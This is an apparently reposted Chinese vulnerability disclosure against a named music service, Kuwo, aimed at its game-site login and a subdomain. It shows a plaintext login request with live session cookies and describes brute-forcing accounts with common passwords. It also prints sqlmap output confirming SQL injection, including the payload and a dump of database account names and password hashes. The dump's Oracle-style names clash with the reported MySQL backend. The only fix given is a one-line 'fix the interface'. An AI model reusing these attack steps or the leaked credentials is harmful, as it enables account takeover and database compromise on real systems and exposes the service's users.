首页    技术博客    PHP教程    数据库技术    前端开发   HTML5    Nginx    php论坛
新用户注册 | 会员登录
加入会员,解锁专属内容
取消
热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

酷我音乐主站某系统登陆处不当可导致爆破需修复接口(已出案例&分站一处SQL注入)网站安全分享!

作者:讨厌上学的-彭志超-_354 | 来源:互联网 | 2023-09-14 18:53
RTRT酷我音乐主站某系统登陆处不当可导致爆破已出案例+&分站一处SQ


RTRT
酷我音乐主站某%ignore_a_1%登陆处不当可导致爆破已出案例+&分站一处SQL注入+敏感信息泄露

WooYun: 酷我音乐www主站存在SQL一枚Root权限

第二发

酷我音乐主站某系统登陆处不当可导致爆破需修复接口(已出案例&分站一处SQL注入)

 

http://game.kuwo.cn/g/st/NewerIndex_2014

登陆处

http://game.kuwo.cn/g/st/WulinLogin

用户名:

密 码:

验证码:

忘记密码

看了下

竟然是明文传输

看下数据返回结果

POST /g/st/WulinLogin HTTP/1.1

Host: game.kuwo.cn

Proxy-Connection: keep-alive

Content-Length: 65

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: http://game.kuwo.cn

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36 2345Explorer/6.5.0.11018

Content-Type: application/x-www-form-urlencoded

Referer: http://game.kuwo.cn/g/st/WulinLogin

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8

COOKIE: JSESSIOnID=318C7DF8B77199FAFBC38546A5126295.jvm1; mzcgid=108; mzcuid=kwg_581878826_mzc; mzcsid=326; mzcguid=581878826; gadtype=""; gadposition=""; Hm_lvt_cdb524f42f0ce19b169a8071123a4797=1451385640,1451446566,1452392626,1453428937; Hm_lpvt_cdb524f42f0ce19b169a8071123a4797=1453957944; Hm_lvt_cdb021f3257f215ddc622af5e5b503a5=1453958461; Hm_lpvt_cdb021f3257f215ddc622af5e5b503a5=1453958461; rec_usr=1453958461525x893_0_1453958461525; r3=y; __utmt=1; __utma=18026403.1373377312.1453958462.1453958462.1453958462.1; __utmb=18026403.1.10.1453958464; __utmc=18026403; __utmz=18026403.1453958462.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); www_game_popup=show_www_game

fromwhere=wulin&username=24324353&password=123456&code=DCOA&tm=50

明文传输的

爆破下居然出来了辣么多用户名密码

密码就用123456

之后用TOP500和1000跑

案例登陆:

 

酷我音乐主站某系统登陆处不当可导致爆破需修复接口(已出案例&分站一处SQL注入)

 

酷我音乐主站某系统登陆处不当可导致爆破需修复接口(已出案例&分站一处SQL注入)

 

酷我音乐主站某系统登陆处不当可导致爆破需修复接口(已出案例&分站一处SQL注入)

附赠一枚注入

sqlmap/1.0-dev – automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 13:13:15

[13:13:15] [INFO] testing connection to the target url

[13:13:15] [INFO] testing if the url is stable, wait a few seconds

[13:13:16] [INFO] url is stable

[13:13:16] [INFO] testing if GET parameter 'id' is dynamic

[13:13:17] [WARNING] GET parameter 'id' appears to be not dynamic

[13:13:17] [WARNING] reflective value(s) found and filtering out

[13:13:17] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)

[13:13:17] [INFO] testing for SQL injection on GET parameter 'id'

[13:13:17] [INFO] testing 'AND boolean-based blind – WHERE or HAVING clause'

[13:13:19] [INFO] GET parameter 'id' is 'AND boolean-based blind – WHERE or HAVING clause' injectable

[13:13:19] [INFO] testing 'MySQL >= 5.0 AND error-based – WHERE or HAVING clause'

[13:13:19] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[13:13:19] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..

[13:13:19] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y

[13:13:24] [INFO] testing 'MySQL UNION query (NULL) – 1 to 20 columns'

[13:13:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found

[13:13:30] [INFO] testing 'Generic UNION query (NULL) – 1 to 20 columns'

[13:13:35] [INFO] checking if the injection point on GET parameter 'id' is a false positive

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y

sqlmap identified the following injection points with a total of 55 HTTP(s) requests:

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind – WHERE or HAVING clause

Payload: id=32 AND 5283=5283

[13:13:38] [INFO] testing MySQL

[13:13:39] [INFO] confirming MySQL

[13:13:40] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.2

[13:13:40] [WARNING] HTTP error codes detected during testing:

500 (Internal Server Error) – 48 times

[13:13:40] [INFO] fetched data logged to text files under 'C:Usersdell-pcAppDataLocalTempHZ$D07~1.789HZ$D07~1.790SQLMAP~1Binoutputh.kuwo.cn'

[*] shutting down at 13:13:40

sqlmap/1.0-dev – automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 13:13:54

Usage: C:Usersdell-pcAppDataLocalTempHZ$D07~1.789HZ$D07~1.790SQLMAP~1BinSqlMap.exe [options]

SqlMap.exe: error: no such option: –current-dbs

Press Enter to continue…

[*] shutting down at 13:13:55

sqlmap/1.0-dev – automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 13:14:11

[13:14:12] [INFO] resuming back-end DBMS 'mysql'

[13:14:12] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind – WHERE or HAVING clause

Payload: id=32 AND 5283=5283

[13:14:12] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL 5

[13:14:12] [WARNING] missing database parameter, sqlmap is going to use the current database to enumerate table(s) columns

[13:14:12] [INFO] fetching current database

password hash: DF02A496267DEE66

[*] MDSYS [1]:

password hash: 72979A94BAD2AF80

[*] MGMT_USER [1]:

password hash: NULL

[*] MGMT_VIEW [1]:

password hash: 9C06E0B8DEF1E2E4

[*] OEM_ADVISOR [1]:

password hash: NULL

[*] OEM_MONITOR [1]:

password hash: NULL

[*] OLAP_DBA [1]:

password hash: NULL

[*] OLAP_USER [1]:

password hash: NULL

[*] OLAPI_TRACE_USER [1]:

password hash: NULL

[*] OLAPSYS [1]:

password hash: 3FB8EF9DB538647C

[*] ORACLE_OCM [1]:

password hash: 5A2E026A9157958C

[*] ORDPLUGINS [1]:

password hash: 88A2B2C183431F00

[*] ORDSYS [1]:

password hash: 7EFA02EC7EA6B86F

[*] OUTLN [1]:

password hash: 4A3BA55E08595C81

[*] PUBLIC [1]:

password hash: NULL

[*] RECOVERY_CATALOG_OWNER [1]:

password hash: NULL

[*] RESOURCE [1]:

password hash: NULL

[*] SAAS14 [1]:

password hash: 0A7CEE43CA9CDE53

[*] SAAS15 [1]:

password hash: 3B0F1AB62BEF8FCE

[*] SAAS16 [1]:

password hash: 79BFF7EAE1080B04

[*] SAAS17 [1]:

password hash: 1B1DDC04432422FC

[*] SAAS18 [1]:

password hash: 1AA2D42C90EE3503

[*] SAAS19 [1]:

password hash: F4AA6D4F8A52CBCE

[*] SAAS20 [1]:

password hash: CF03BEE15E16B003

[*] SCHEDULER_ADMIN [1]:

password hash: NULL

[*] SELECT_CATALOG_ROLE [1]:

password hash: NULL

[*] SI_INFORMTN_SCHEMA [1]:

password hash: 84B8CBCA4D477FA3

[*] SYS [1]:

password hash: A3D298F6BB7BFA37

[*] SYSMAN [1]:

password hash: 9E54353A9E15CC0D

[*] SYSTEM [1]:

password hash: 097317F2082C6682

[*] TSMSYS [1]:

password hash: 3DF26A8B17D0F29F

[*] WM_ADMIN_ROLE [1]:

password hash: NULL

[*] WMSYS [1]:

password hash: 7C9BA362F8314299

[*] WOYODEV [1]:

password hash: NULL

[*] XDB [1]:

password hash: 88D8364765FCE6AF

[*] XDBADMIN [1]:

password hash: NULL

[*] XDBWEBSERVICES [1]:

password hash: NULL

解决方案:

修复接口
 

www.dengb.comtruehttp://www.dengb.com/wzaq/1109242.htmlTechArticle酷我音乐主站某系统登陆处不当可导致爆破需修复接口(已出案例分站一处SQL注入) RTRT 酷我音乐主站某系统登陆处不当可导致爆破已出案…

—-想了解更多的网站安全相关处理怎么解决关注<编程笔记>


推荐阅读
  • schema

    MySQL显示SQL语句执行时间的实例详解

    本文详细介绍了如何使用MySQL来显示SQL语句的执行时间,并通过MySQL Query Profiler获取CPU和内存使用量以及系统锁和表锁的时间。同时介绍了效能分析的三种方法:瓶颈分析、工作负载分析和基于比率的分析。 ... [详细]
  • text

    Android 新闻App的本地服务器搭建教程

    本文介绍了在开发Android新闻App时,搭建本地服务器的步骤。通过使用XAMPP软件,可以一键式搭建起开发环境,包括Apache、MySQL、PHP、PERL。在本地服务器上新建数据库和表,并设置相应的属性。最后,给出了创建new表的SQL语句。这个教程适合初学者参考。 ... [详细]
  • cookie

    如何限制php数据库链接数和连接超时时间?

    本文介绍了如何使用php限制数据库插入的条数并显示每次插入数据库之间的数据数目,以及避免重复提交的方法。同时还介绍了如何限制某一个数据库用户的并发连接数,以及设置数据库的连接数和连接超时时间的方法。最后提供了一些关于浏览器在线用户数和数据库连接数量比例的参考值。 ... [详细]
  • string

    Hibernate基础映射

    在说Hibernate映射前,我们先来了解下对象关系映射ORM。ORM的实现思想就是将关系数据库中表的数据映射成对象,以对象的形式展现。这样开发人员就可以把对数据库的操作转化为对 ... [详细]
  • ip

    PHP中的MySQL函数库及其常用函数介绍

    本文由编程笔记小编整理,介绍了PHP中的MySQL函数库及其常用函数,包括mysql_connect、mysql_error、mysql_select_db、mysql_query、mysql_affected_row、mysql_close等。希望对读者有一定的参考价值。 ... [详细]
  • ip

    ASP.NET Tips: 获取插入记录的ID的方法详解

    本文详细介绍了在ASP.NET中获取插入记录的ID的几种方法,包括使用SCOPE_IDENTITY()和IDENT_CURRENT()函数,以及通过ExecuteReader方法执行SQL语句获取ID的步骤。同时,还提供了使用这些方法的示例代码和注意事项。对于需要获取表中最后一个插入操作所产生的ID或马上使用刚插入的新记录ID的开发者来说,本文提供了一些有用的技巧和建议。 ... [详细]
  • text

    VB.NET在线急等问题解决方法,如何统计数据库字段下的数据并显示在文本框里?

    本文介绍了一个在线急等问题解决方法,即如何统计数据库中某个字段下的所有数据,并将结果显示在文本框里。作者提到了自己是一个菜鸟,希望能够得到帮助。作者使用的是ACCESS数据库,并且给出了一个例子,希望得到的结果是560。作者还提到自己已经尝试了使用"select sum(字段2) from 表名"的语句,得到的结果是650,但不知道如何得到560。希望能够得到解决方案。 ... [详细]
  • datetime

    高质量SQL书写的30条建议

    高质量SQL书写的30条建议
    本文提供了30条关于优化SQL的建议,包括避免使用select *,使用具体字段,以及使用limit 1等。这些建议是基于实际开发经验总结出来的,旨在帮助读者优化SQL查询。 ... [详细]
  • schema

    MySQL表分区的创建、增加和删除方法详解

    本文详细介绍了MySQL表分区的创建、增加和删除方法,包括查看分区数据量和全库数据量的方法。欢迎大家阅读并给予点评。 ... [详细]
  • ip

    如何在php中将mysql查询结果赋值给变量

    如何在php中将mysql查询结果赋值给变量
    本文介绍了在php中将mysql查询结果赋值给变量的方法,包括从mysql表中查询count(学号)并赋值给一个变量,以及如何将sql中查询单条结果赋值给php页面的一个变量。同时还讨论了php调用mysql查询结果到变量的方法,并提供了示例代码。 ... [详细]
  • ip

    一句话解决高并发的核心原则

    一句话解决高并发的核心原则
    本文介绍了解决高并发的核心原则,即将用户访问请求尽量往前推,避免访问CDN、静态服务器、动态服务器、数据库和存储,从而实现高性能、高并发、高可扩展的网站架构。同时提到了Google的成功案例,以及适用于千万级别PV站和亿级PV网站的架构层次。 ... [详细]
  • text

    javascript入门·表单与表单元素总结(表单验证)

    表单提交前的最后验证:通常在表单提交前,我们必须确认用户是否都把必须填选的做了,如果没有,就不能被提交到服务器,这里我们用到表单的formname.submit()看演示,其实这个对于我们修炼道 ... [详细]
  • text

    Google Contacts API未返回输出 - Google Contacts API not returning output

    Itwasworkingcorrectly,butyesterdayitstartedgiving401.IhavetriedwithGooglecontactsAPI ... [详细]
  • main

    使用粘性页眉和页脚切换侧栏 - Toggle Sidebar with sticky header and footer

    Iwouldliketobeabletohaveasidebarthatcanbetoggledinandoutonabuttonpress.However ... [详细]
  • text

    JAVASCRIPT实现的WEB页面跳转以及页面间传值方法

    但有时候,需要当某事件触发时,我们先做一些操作,然后再跳转,这时,就要用JAVASCRIPT来实现这一跳转功能。下面是具体的做法:一:跳转到新页面,并且是在新窗口中打开时:复制代码代码如下:fu ... [详细]
author-avatar
讨厌上学的-彭志超-_354
这个家伙很懒,什么也没留下!
Tags | 热门标签
RankList | 热门文章
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有